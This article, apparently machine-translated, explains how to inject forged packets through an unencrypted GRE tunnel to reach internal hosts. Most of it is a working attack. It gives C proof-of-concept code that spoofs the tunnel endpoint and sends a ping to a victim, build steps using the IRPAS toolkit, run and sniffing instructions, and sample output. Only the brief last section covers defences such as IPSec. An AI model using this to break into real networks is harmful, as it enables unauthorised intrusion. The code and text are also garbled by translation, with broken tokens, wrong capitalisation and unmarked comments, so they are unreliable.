Gre packet injection attacks and Defense Analysis

The GRE protocol is used to build a channel that passes through the public Internet, so that non-IP traffic based on protocols that cannot publish routes can reach their destination.

To attack hosts on the internal network, you need to know the external IP addresses of the two terminals that provide the GRE tunnel and the internal IP addresses of the hosts you want to attack. This can be achieved through multiple methods, such as Google operator search, route listing, sniffing, and fingerprint recognition.

 

First, we need to generate a GRE package whose destination IP address is xxx. xxx. xxx.5 (one end of the GRE tunnel), the source IP address is xxx. xxx. xxx.1 (the other end of the GRE tunnel ). The GRE header of this package is initially set to null. We put the load into our package, and its destination IP address is. a. a.5 (internal IP address of the affected host). The source IP address is the host address controlled by us that can be used to sniff received responses. Please note that we need to place the package on the path that will certainly generate a response, otherwise we will never be able to detect whether the attack is successful.

The following is a concept validation code for ICMP ping injection. This is a wise choice, because hosts on the internal network will not block ICMP echo requests.

# Include <stdio. h>
# Include <stdlib. h>
# Include <unistd. h>
# Include <string. h>
# Include <netinet/in. h>
# Include <rpc/types. h>
# Include <netdb. h>
# Include <sys/socket. h>
# Include <arpa/inet. h>
# Include <errno. h>
# Include <signal. h>
# Include <sys/types. h>
# Include <fcntl. h>

# Include "protocols. h"
# Include "packets. h"

This is a very bad test.
We send A ping packet to VICTIM and intrude into the GRE tunnel between router a and router B. VICTIM is located behind ROUTER.
The following information is used:
Victim ip Address
Router a's
External IP Address
Target tunnel settings (may be router B)
Router B's
External IP Address

Packets are encapsulated in IPv4 and GRE (RFC1701) headers. It then sends the sender address of the tunnel source address (which may be the external IP address of router B) to ROUTER. Then, VICTIM responds to ICMP echo and sends the default ROUTER to router. The source address of the data packet encapsulated by router a is ours. Therefore, if router a can reach us, it will return the packet to us. Otherwise, it may send data packets to router B's GRE and send them to us.

# Define VICTIM "v. v. v.5"
# Define ROUTER_A "xxx. xx5"
# Define ROUTER_ B "xxx. xx1"
Struct {
Struct in_addr router_a;
Struct in_addr router_ B;
Struct in_addr victim;
} Cfg;

Int main (int argc, char ** argv ){

U_char * packet;
Iphdr_t * ip_gre, * ip_my;
Grehdr_t * gre;
Icmp_ping_t * ping;
Int psize;
Int socket;

Initialize a socket and enter packet_ifconfig
Socket = init_socket_IP4 ("eth0", 0 );

Generate IP Address

Inet_aton (VICTIM, & (cfg. victim ));
Inet_aton (ROUTER_A, & (cfg. router_a ));
Inet_aton (ROUTER_ B, & (cfg. router_ B ));

Create external data packets
Psize = sizeof (iphdr_t) * 2
+ Sizeof (grehdr_t)
+ Sizeof (icmp_ping_t );
Packet = (u_char *) smalloc (psize + 3 );

Ip_gre = (iphdr_t *) packet;
Ip_gre-> version = 4;
Ip_gre-> ihl = sizeof (iphdr_t)/4;
Ip_gre-> tot_len = htons (psize );
Ip_gre-> protocol = IPPROTO_GRE;
Ip_gre-> id = htons (0 xAFFE); this is a test
Ip_gre-> ttl = 30;
Memcpy (& (ip_gre-> saddr. s_addr), & (cfg. router_ B .s_addr), IP_ADDR_LEN );
Memcpy (& (ip_gre-> daddr. s_addr), & (cfg. router_a.s_addr), IP_ADDR_LEN );

Gre = (grehdr_t *) (packet + sizeof (iphdr_t ));
Gre-> flags = 0;
Gre-> proto = htons (0x0800); IPv4-RFC1700

Ip_my = (iphdr_t *) (packet + sizeof (iphdr_t) + sizeof (grehdr_t ));
Ip_my-> version = 4;
Ip_my-> ihl = sizeof (iphdr_t)/4;
Ip_my-> tot_len = htons (sizeof (iphdr_t) + sizeof (icmp_ping_t ));
Ip_my-> protocol = IPPROTO_ICMP;
Ip_my-> id = htons (0xF0F0 );
Ip_my-> ttl = 30;
Memcpy (& (ip_my-> saddr. s_addr ),
& (Packet_ifconfig.ip.s_addr), IP_ADDR_LEN );
Memcpy (& (ip_my-> daddr. s_addr), & (cfg. victim), IP_ADDR_LEN );
Because there is no interface, we need to verify ourselves
Ip_my-> check = chksum (u_char *) (ip_my), sizeof (iphdr_t ));

Ping = (icmp_ping_t *) (packet + sizeof (iphdr_t) * 2 + sizeof (grehdr_t ));
Ping-> icmp. type = ICMP_ECHO;
Ping-> echo. identifier = 0x22;
Ping-> icmp. checksum = chksum (u_char *) ping, sizeof (icmp_ping_t ));
Send test package

Sendpack_IP4 (socket, packet, psize );
Close (socket );

Return 0;
}

 

Don't expect to compile the Code directly, you need to set the IRPAS Suite (http://www.phenoelit-us.org/irpas/irpas_0.10.tar.gz) in Phenoelit Tools ). Download and decompress IRPAS, save the above program to the IRPAS directory under gre. c, and open Makefile. You need to add gre. o and gre in the OBJECTS and PROGRAMS definitions, and add the following lines, which will determine the compilation in gre. c:

Gre. o: gre. c packets. h protocols. h
$ {CC }$ {CFLAGS}-c gre. c
Gre: gre. o libpackets.
$ {CC }$ {CFLAGS}-o gre. o-lpackets $ {CLIBS}

From this perspective, each time you need to launch an attack against a specific target, you need to change the value of the prerequisite for the attack described in gre. c and re-compile the tool.

VICTIM, ROUTER_A and ROUTER_ B

Once the branch router receives such a packet, it unpacks the packet. The forged IP packet is transmitted along the route table of the router and reaches the affected host. The branch router checks the source address of the GRE package before unencapsulating it. However, because the package is forged from the Headquarters router, it will be recognized and put in the past.

Once the packet arrives at the affected machine, an ICMP echo response will be generated. This response will be sent back to the specified IP address, which is our sniffing machine on the Internet. In our example, the default route of all traffic passes through the headquarters, so the packet is sent back to the headquarters through the GRE tunnel, and then forwarded from the headquarters to our host. You should not expect the package to have. a. a.5 IP address, because the private address will be converted by the Headquarters router through NAT, you must "adjust" Your tcpdump sniffing session to capture it. Then you should see a response from the victim host.
This attack is simple: you only need to execute #./gre and turn to the tcpdump "listener" to sniff the response. The following information appears on the router that receives the packet:

025620: 15: 55: 22: IP: s = a. a.1 (Tunnel0), d = v. v. v.1 (Ethernet0/1), len 84, rcvd 3
025621: 15: 55: 22: IP: s = v. v. v.1 (Ethernet0/1), d = a. a. a.1 (Tunnel0), len 84, sending

The following figure shows the output of the listener. You can see the ICMP response:

15:55:22. 553968 IP xxx. xxx. xxx.1> a. a. a.1: icmp 64: echo reply seq 0

Conclusion
~~~~~~~
Although this attack sounds easy to implement, it cannot be guaranteed to be effective. It depends on the network settings and firewall configurations. However, the rules used for internal tunnel traffic are usually loose and you have a chance to intrude in this way. Even if you have not received a response from the victim host for the first time, it cannot be said that the attack package has not arrived at the host. In this example, the target host may block ping, or the vro or firewall only allows ICMP echo responses to be transmitted over the LAN. It is still possible to obtain the root permission of the target device by using the technology that does not require two-way communication with the affected host, depending on your purpose.

Preventive Measures
~~~~~~~~~~~
If someone uses an unencrypted GRE tunnel over the Internet, this person will at least be considered careless. The best way to protect communication is to use the correct encryption and authentication, or you can also use the access control list on the firewall that acts on the traffic that flows out of the tunnel. At least pre-shared key IPSec is used to protect the content of the GRE package and defeat the attacker. After all, it is not that difficult.